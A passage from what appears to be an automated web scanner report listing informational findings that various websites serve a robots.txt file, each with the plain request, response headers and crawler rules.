Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

User-agent: Mediapartners-Google*
Disallow:


User-agent: *
Disallow: /listingdetails.html
Disallow: /property/
Disallow: /search.html
Disallow: /listing.html
Disallow: /bankruptcylaw.html
Disallow: /
...[SNIP]...

30.235. http://www.hyperhistory.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hyperhistory.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hyperhistory.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:40:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 17 Apr 2008 10:33:23 GMT
ETag: "31222f2-42f-44b0f29b282c0"
Accept-Ranges: bytes
Content-Length: 1071
Connection: close
Content-Type: text/plain

User-agent: DittoSpyder
Disallow: /

User-agent: psbot
Disallow: /

User-agent: MSIECrawler
Disallow: /

User-agent: Teleport
Disallow: /

User-agent: TeleportPro
Disallow: /

User-agen
...[SNIP]...

30.236. http://www.ibegin.com/weather/weather_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 08 Oct 2010 14:12:24 GMT
ETag: "1400db-166-4921b99814200"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /about/
Disallow: /blog/
Disallow: /weather/share
Disallow: /weather/xml
Disallow: /weather/removelocation.php
Disallow: /weather/setlocation.php
Disallow:
...[SNIP]...

30.237. http://www.icd9data.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icd9data.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icd9data.com

Response

HTTP/1.1 200 OK
Content-Length: 5842
Content-Type: text/plain
Last-Modified: Sat, 01 Jul 2006 12:42:32 GMT
Accept-Ranges: bytes
ETag: "fb2252d2b9dc61:70040"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:43:06 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

User-agent: aipbot
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: Alexibot
Disallow: /

User-agent: Aqua_Products
D
...[SNIP]...

30.238. http://www.icomamerica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icomamerica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icomamerica.com

Response

HTTP/1.1 200 OK
Content-Length: 266
Content-Type: text/plain
Content-Location: http://www.icomamerica.com/robots.txt
Last-Modified: Sat, 20 Jun 2009 05:24:03 GMT
ETag: "11f3335367f1c91:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:32 GMT
Connection: close

# robots.txt for www.icomamerica.com

User-agent: *

# do not attempt to index includes files.
Disallow: /_admin/
Disallow: /_scripts/
Disallow: /controls/
Disallow: /css/
Disallow: /en/downl
...[SNIP]...

30.239. http://www.idealwifes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idealwifes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idealwifes.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:32 GMT
Server: Apache
Last-Modified: Wed, 21 Apr 2010 19:11:08 GMT
ETag: "e6962-83-4bcf4dcc"
Accept-Ranges: bytes
Content-Length: 131
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tr/
Disallow: /?x=
Disallow: /count/
Allow: /pictures/
Sitemap: http://www.idealwifes.com/sitemap.xml

30.240. http://www.igl.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igl.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.igl.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:51 GMT
Server: Apache
Last-Modified: Mon, 21 Jun 2010 21:16:35 GMT
ETag: "4b5205-48-48990d1ccd2c0"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 5
Disallow: /cgi-bin/
Disallow: /*/messages/

30.241. http://www.ilmeteo.it/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ilmeteo.it
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ilmeteo.it

Response

HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Wed, 19 Mar 2008 09:03:23 GMT
ETag: "68a30-4f-448c6866f2cc0"
Vary: Accept-Encoding
Content-Type: text/plain
X-Cacheable: YES
Content-Length: 79
Date: Mon, 02 May 2011 00:04:55 GMT
X-Varnish: 688515217 688508938
Age: 294
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 1

User-agent: Googlebot
Disallow: /index2.html
Disallow: /portale/index2.html

30.242. http://www.index.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.index.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.index.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) mod_gzip/1.3.26.1a mod_fastcgi/2.4.6 mod_throttle/3.1.2 Chili!Soft-ASP/3.6.2 FrontPage/5.0.2.2635 mod_perl/1.31 PHP/4.4.9
Vary: *
Last-Modified: Tue, 15 Feb 2005 19:24:52 GMT
ETag: "91c016-1500-42124c84"
Accept-Ranges: bytes
Content-Length: 5376
Connection: close
Content-Type: text/plain

# robots.txt
# Please, we do NOT allow non-se spiders any longer.

User-agent: BotRightHere
Disallow: /

User-agent: larbin
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Python-urllib
Disall
...[SNIP]...

30.243. http://www.info.org.il/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.org.il
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.info.org.il

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:20 GMT
Server: Apache
Last-Modified: Thu, 25 Jun 2009 20:13:32 GMT
ETag: "1de8673-86-46d31db9a7300"
Accept-Ranges: bytes
Content-Length: 134
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /irrelevant/item_mail.php/

Disallow: /irrelevant/*.txt
Disallow: /irrelevant/item.php/109100457720509254

30.244. http://www.inosmi.ru/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inosmi.ru
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inosmi.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 02 May 2011 00:00:20 GMT
Content-Type: text/plain
Connection: close
Content-Length: 130
Last-Modified: Tue, 20 Apr 2010 13:18:07 GMT
Accept-Ranges: bytes

##ACAP version=1.0

User-agent: *
Host: www.inosmi.ru
Disallow: *-print.html$

ACAP-crawler: *
ACAP-disallow-crawl: *-print.html$

30.245. http://www.iptv.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iptv.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iptv.org

Response

HTTP/1.1 200 OK
Content-Length: 680
Content-Type: text/plain
Content-Location: http://www.iptv.org/robots.txt
Last-Modified: Mon, 27 Dec 2010 15:15:11 GMT
Accept-Ranges: bytes
ETag: "1ef4b7dad8a5cb1:dfa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:48 GMT
Connection: close

User-agent: *
Crawl-delay: 4
Request-rate: 1/4
Disallow: /email_2a_friend.cfm
Disallow: /contact.cfm
Disallow: /schedule.cfm
Disallow: /test/
Disallow: /danny/
Disallow: /css/
Disallow: /flas
...[SNIP]...

30.246. http://www.irishfest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishfest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irishfest.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 05 Apr 2005 19:30:26 GMT
Accept-Ranges: bytes
ETag: "035ecea153ac51:41880"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:38:06 GMT
Content-Length: 96
Connection: close
Via: 1.1 AN-0003011043562112

User-agent: *
Disallow: /admin/
Disallow: /imgsrc/
Disallow: /Library/
Disallow: /Templates/

30.247. http://www.itracks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itracks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itracks.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Aug 2010 15:28:39 GMT
Accept-Ranges: bytes
ETag: "7b586b7c35cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:13:25 GMT
Connection: close
Content-Length: 304

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.248. http://www.jacksonnewspapers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jacksonnewspapers.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:16:32 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: MISS from parent2.ghm.zope.net
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 parent2.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

30.249. http://www.jacksonsun.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonsun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jacksonsun.com

Response

HTTP/1.0 200 OK
Content-Length: 740
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:17:23 GMT
Accept-Ranges: bytes
ETag: "804331e2d779cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Sun, 01 May 2011 23:55:32 GMT
Connection: close

# Robots.txt
# Be nice.
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /a
...[SNIP]...

30.250. http://www.javaworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.javaworld.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 02 May 2011 00:14:32 GMT
Cache-Control: max-age=600 ,public
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "550fa3-3e3-48824a805df80"
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.193.214.243.1304295272740691; path=/; expires=Wed, 01-May-13 00:14:32 GMT
Last-Modified: Thu, 03 Jun 2010 18:48:46 GMT
Accept-Ranges: bytes
Content-Length: 995
Content-Type: text/plain; charset=UTF-8

# This robot.txt file should turn on ALL robots, crawlers and worms for visting
# ALL of your pages. The URL I extracted this from is at:
#
# http://info.webcrawler.com/mak/projects/robots/norobots
...[SNIP]...

30.251. http://www.jhoos.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jhoos.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "289175858"
Last-Modified: Wed, 24 Nov 2010 07:37:46 GMT
Content-Length: 26
Connection: close
Date: Sun, 01 May 2011 23:36:21 GMT
Server: lighttpd/1.4.28-devel-485M

User-agent: *
Disallow:


30.252. http://www.jmu.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jmu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jmu.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:55 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 12:34:35 GMT
Accept-Ranges: bytes
Content-Length: 2709
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


# robots.txt for http://www.jmu.edu/

User-agent: *
Disallow: /cascadetest
Disallow: /catalog/94/ # 1994 catalog should not be indexed.
Disallow: /catalog/95/ # 1995 catalog sho
...[SNIP]...

30.253. http://www.jobsahoy.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsahoy.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jobsahoy.net

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:23:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

30.254. http://www.journalstandard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journalstandard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journalstandard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:55 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: MISS from parent2.ghm.zope.net
X-Cache: MISS from cache2.ghm.zope.net
Via: 1.0 parent2.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

30.255. http://www.jpfun.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpfun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jpfun.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:17 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 23 Jul 2010 13:27:10 GMT
ETag: "719890d-243-fdf50780"
Accept-Ranges: bytes
Content-Length: 579
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow: /download/
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /ssi/
Disallow: /images/
Disallow: /js/
Disallow: /ads/
Disallow: /test.shtml
Disallow: /testing.s
...[SNIP]...

30.256. http://www.keds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keds.com

Response

HTTP/1.0 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:40:12 GMT
ETag: "e8-49aec65757b00"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:38:12 GMT
Content-Length: 232
Connection: close

User-agent: *

Disallow: /store/user/login.jsp?redirectURL=/store/home/home.jsp
Disallow: /store/home/privacy.jsp
Disallow: /store/home/terms.jsp
Disallow: /store/account/
Disallow: /store/check
...[SNIP]...

30.257. http://www.kellehampton.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kellehampton.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kellehampton.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 02 May 2011 02:14:13 GMT
Date: Sun, 01 May 2011 02:14:13 GMT
Last-Modified: Sun, 01 May 2011 02:12:08 GMT
ETag: "aa398782-3c99-4a4f-9afc-1780f2c5d598"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 77659
Cache-Control: public, max-age=86400, must-revalidate, proxy-revalidate

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.kellehampton.com/feeds/posts/defau
...[SNIP]...

30.258. http://www.kens5.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kens5.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kens5.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 16:47:30 GMT
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Mon, 02 May 2011 00:08:50 GMT
Content-Length: 195
Connection: close
Set-Cookie: click_mobile=0

User-agent: *
sitemap: /sitemap.xml
Disallow:/search
Disallow:/searchresults
Disallow:/results
Disallow:/entertainment/movies/movie-listings
Disallow:/entertainment/movies/advanced-search

30.259. http://www.kingpayday.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kingpayday.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kingpayday.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:14 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:11:47 GMT
ETag: "87360f-e7-4d30ae03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

30.260. http://www.knowledgerush.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.knowledgerush.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.knowledgerush.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:00:21 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Fri, 10 Sep 2010 21:21:47 GMT
ETag: "188693-c5-48fee55919560"
Accept-Ranges: bytes
Content-Length: 197
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver
Disallow: /
User-agent: discobot
Disallow: /
User-agent: MLBot
Disallow: /
User-agent: ccbot
Disallow: /
User-agent: archive_crawler
Disallow: /
User-agent: 008
Disallow: /

30.261. http://www.knowyourmobile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.knowyourmobile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.knowyourmobile.com

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Content-Type: text/plain; charset=utf-8
X-Powered-By: NetGenie
Pragma:
Content-Length: 77
expires: -1
cache-control: no-cache
Date: Mon, 02 May 2011 00:25:35 GMT
X-Varnish: 1363337191 1339853127
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: HIT
X-Cache-Hits: 1501

Sitemap: http://www.knowyourmobile.com/sitemap.xml
User-agent: *
Disallow:



30.262. http://www.kobobooks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kobobooks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kobobooks.com

Response

HTTP/1.0 200 OK
Content-Length: 24
Content-Type: text/plain
Content-Location: http://www.kobobooks.com/robots.txt
Last-Modified: Thu, 28 Apr 2011 15:28:54 GMT
Accept-Ranges: bytes
ETag: "0ff96fbb85cc1:4cf9"
Server: Microsoft-IIS/6.0
srv: web17
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:09:52 GMT
Connection: close

User-agent: *
Disallow:

30.263. http://www.kottke.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kottke.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kottke.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:18 GMT
Server: Apache
Last-Modified: Sun, 27 Jun 2004 22:36:06 GMT
ETag: "321dda-6f-3dddf3aea2180"
Accept-Ranges: bytes
Content-Length: 111
Keep-Alive: timeout=2, max=150
Connection: close
Content-Type: text/plain

# robots.txt file for kottke.org

# general crawlers

User-agent: *
Disallow: /cgi-bin
Disallow: /stats

30.264. http://www.ksrevenue.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ksrevenue.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ksrevenue.org

Response

HTTP/1.1 200 OK
Content-Length: 53
Content-Type: text/plain
Last-Modified: Thu, 28 Oct 2010 21:53:36 GMT
Accept-Ranges: bytes
ETag: "d6e17c92ea76cb1:2206"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:21:51 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /styles/

30.265. http://www.kxii.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kxii.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kxii.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 23:06:02 GMT
X-Server-Name: sj-c14-r8-u31-b12
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:06:02 GMT
Content-Length: 55
Connection: close
Set-Cookie: click_mobile=0

User-agent: *
Disallow:/search
Disallow:/searchresults

30.266. http://www.lacetoleather.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lacetoleather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lacetoleather.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:14 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Sat, 04 Oct 2008 10:17:04 GMT
ETag: "1ed4989-8e-48e742a0"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Disallow:
Disallow: /cgi-bin/
Sitemap: http://lacetoleather.com/sitemap.html

30.267. http://www.latingossip.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latingossip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latingossip.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:55 GMT
Server: Apache/2.0.54
Last-Modified: Fri, 02 Mar 2007 20:10:36 GMT
ETag: "102ab3-df-335da700"
Accept-Ranges: bytes
Content-Length: 223
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /0/
Disallow: /images/
Disallow: /downloads/
Disallow: /stats/
Disallow: /private/
Disallow: /links/
Disallow: /go/
Disallow: /?p=
Disallow: /?cat=

User-ag
...[SNIP]...

30.268. http://www.lavalife.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lavalife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lavalife.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
p3p: CP="CAO PSA OUR"
Accept-Ranges: bytes
ETag: W/"24-1296589877000"
Last-Modified: Tue, 01 Feb 2011 19:51:17 GMT
Content-Type: text/plain
Content-Length: 24
Date: Sun, 01 May 2011 03:20:05 GMT
Age: 73511
X-Cache: HIT from www.lavalife.com
Connection: close

User-agent: *
Allow: /


30.269. http://www.ldoceonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ldoceonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ldoceonline.com

Response

HTTP/1.0 200 OK
Date: Tue, 21 Sep 2010 09:41:50 GMT
Server: Apache/1.3.34 (Debian) mod_perl/1.29
Last-Modified: Wed, 17 Sep 2008 14:16:11 GMT
ETag: "18-48d1112b"
Accept-Ranges: bytes
Content-Length: 24
Content-Type: text/plain; charset=UTF-8
Age: 243471
X-Cache: HIT from www.ldoceonline.com
X-Cache-Lookup: HIT from www.ldoceonline.com:801
Via: 1.0 www.ldoceonline.com:801 (squid/2.6.STABLE5)
Connection: close

User-Agent: *
Allow: /


30.270. http://www.lduhtrp.net/image-4989411-10765500

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lduhtrp.net
Path:   /image-4989411-10765500

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lduhtrp.net

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:18:26 GMT

# go away
User-agent: *
Disallow: /

30.271. http://www.lee.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lee.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lee.net

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Mon, 02 May 2011 00:19:24 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4998
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: lee.net
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

30.272. http://www.lenox.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lenox.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:54:27 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 22 Oct 2010 15:18:45 GMT
ETag: "42e4fb6afc71cb1:52e7"
Content-Length: 186

# robots.txt for the site http://www.lenox.com

User-agent:*
Disallow: /images
Disallow: /cart
Disallow: /checkout
Disallow: /guidedNav

SITEMAP: http://www.lenox.com/index.xml

30.273. http://www.leo.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leo.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.leo.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:51 GMT
Server: Apache
Last-Modified: Mon, 23 Oct 2006 11:46:30 GMT
ETag: "49cab-17-1319180"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=iso-8859-15

